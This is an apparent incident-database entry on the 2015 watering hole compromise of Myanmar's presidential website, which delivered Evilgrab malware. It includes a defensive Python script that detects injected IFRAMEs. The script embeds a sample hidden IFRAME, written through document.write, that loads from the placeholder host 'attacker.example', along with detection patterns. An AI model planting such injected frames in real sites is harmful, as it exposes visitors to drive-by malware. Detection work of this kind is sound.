Cyber Incident Victim: Myanmar
Date:
May 2015
Location:
Myanmar
Summary
A watering hole attack compromised the official website of the President of Myanmar: a malicious inline frame (IFRAME) was injected into one of the site's JavaScript files, so that visitors to the main page silently loaded exploit content that delivered the Evilgrab malware (also known as Vidgrab). The threat actors most likely targeted individuals involved in the country's political or economic affairs for intelligence gathering, and had held unauthorized access to the site for an extended period before the compromise was detected. After disclosure, the site's operators took the original domain offline and migrated the content to a new domain that did not contain the exploit code, indicating remediation. The incident combined a strategic website compromise (watering hole) with infrastructure tied to information-stealing malware.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On May 12, 2015, Unit 42 identified a watering hole attack targeting the official website of the President of Myanmar, hosted at "www.president-office.gov[.]mm". The compromise consisted of an inline frame (IFRAME) injected into a JavaScript file belonging to the theme of the site's Drupal content management system. Because that file is loaded by the main page, every visitor to the front page unknowingly loaded the exploit content served through the IFRAME. Evidence indicated that the threat actors had held unauthorized access to the website since at least November 2014, suggesting prolonged surveillance or staging before the observed exploitation. The attackers chose this high-profile government platform to reach individuals in Myanmar, people engaged in political relations with the country, and organizations doing business there: visitors trust a government site, so a compromise of it let the threat group distribute malware under cover of the site's legitimacy.
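The injection described above leaves two artifacts a site owner can check for: a theme JavaScript file whose hash no longer matches the deployed release, and an IFRAME (typically zero-sized or hidden, pointing at a third-party host) written from that file. The following Python script is an added example, not code from Unit 42 or from the compromised site; the sample Drupal theme script, the benign same-origin embed and the attacker host "attacker.example" are all constructed placeholders, and the hostnames are assumptions rather than indicators from this incident.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed stand-in for a Drupal theme script (not the real file from the site).
CLEAN_JS = """(function ($) {
  // Constructed sample: a typical Drupal theme behavior, nothing malicious here.
  Drupal.behaviors.themeMenu = {
    attach: function (context, settings) {
      $('ul.menu', context).addClass('js-menu');
    }
  };
})(jQuery);
document.write('<iframe src="https://www.president-office.gov.mm/embed/stats" width="300" height="200"></iframe>');
"""

# Constructed injected variant: the same file with a hidden, off-site IFRAME appended.
# "attacker.example" is a placeholder, not an indicator from the incident.
INJECTED_JS = CLEAN_JS + (
    "document.write('<iframe src=\"http://attacker.example/load.php\" "
    "width=\"0\" height=\"0\" style=\"visibility:hidden\"></iframe>');\n"
)

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""src\s*=\s*['"]?([^'"\s>]+)""", re.I)
HIDDEN = re.compile(r"""(width|height)\s*=\s*['"]?0\b|visibility\s*:\s*hidden|display\s*:\s*none""", re.I)
WRITE = re.compile(r"document\.write\s*\(", re.I)


def sha256_hex(text):
    """Hash a file body; a baseline of these hashes is taken from the clean theme release."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def changed_files(files, baseline):
    """Return names of files whose current hash differs from the recorded baseline."""
    return sorted(name for name, body in files.items() if baseline.get(name) != sha256_hex(body))


def scan_js(text, site_host):
    """Flag IFRAMEs in a JS file that are hidden or point off-site.

    A visible, same-origin IFRAME is left alone (a legitimate embed);
    anything zero-sized/hidden or pointing to another host is reported,
    with a note if it is emitted via document.write().
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for tag in IFRAME.findall(line):
            src_match = SRC.search(tag)
            src = src_match.group(1) if src_match else None
            host = urlparse(src).hostname if src else None
            reasons = []
            if HIDDEN.search(tag):
                reasons.append("hidden")
            if host and host != site_host:
                reasons.append("external:" + host)
            if not reasons:
                continue  # visible and same-origin: treat as a legitimate embed
            if WRITE.search(line):
                reasons.append("document.write")
            findings.append({"line": lineno, "src": src, "reasons": reasons})
    return findings


# Baseline recorded when the theme was deployed clean (constructed for this example).
BASELINE = {"theme.js": sha256_hex(CLEAN_JS), "menu.js": sha256_hex(CLEAN_JS)}

if __name__ == "__main__":
    deployed = {"theme.js": INJECTED_JS, "menu.js": CLEAN_JS}
    for name in changed_files(deployed, BASELINE):
        print("modified since baseline:", name)
        for f in scan_js(deployed[name], "www.president-office.gov.mm"):
            print("  line %d: %s (%s)" % (f["line"], f["src"], ", ".join(f["reasons"])))
```

Run against the real theme directory, the hash check is the cheap first pass (it would have flagged a file altered months before the malware was ever observed), and the IFRAME scan then points at the exact line and the host the frame loads from, which is what goes into the blocklist and the notification to the hosting team.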

Unit 42 notified the website operators, who subsequently took the compromised domain offline. A replacement website with identical content was established at "www.myanmarpresidentoffice.info"; it retained artifacts referencing the original domain but contained no trace of the exploit code, so the migration appeared to be part of the remediation following the disclosure. The delivered payload, identified as Evilgrab (also known as Vidgrab), is consistent with information-gathering malware, though its specific functionality was not detailed in the public analysis. The incident is one instance of persistent targeting of Myanmar's digital infrastructure, with threat actors compromising trusted web platforms to stage strategic (watering hole) attacks. That the intrusion went unnoticed for months underscores how hard it is to detect and remediate such compromises of government assets.
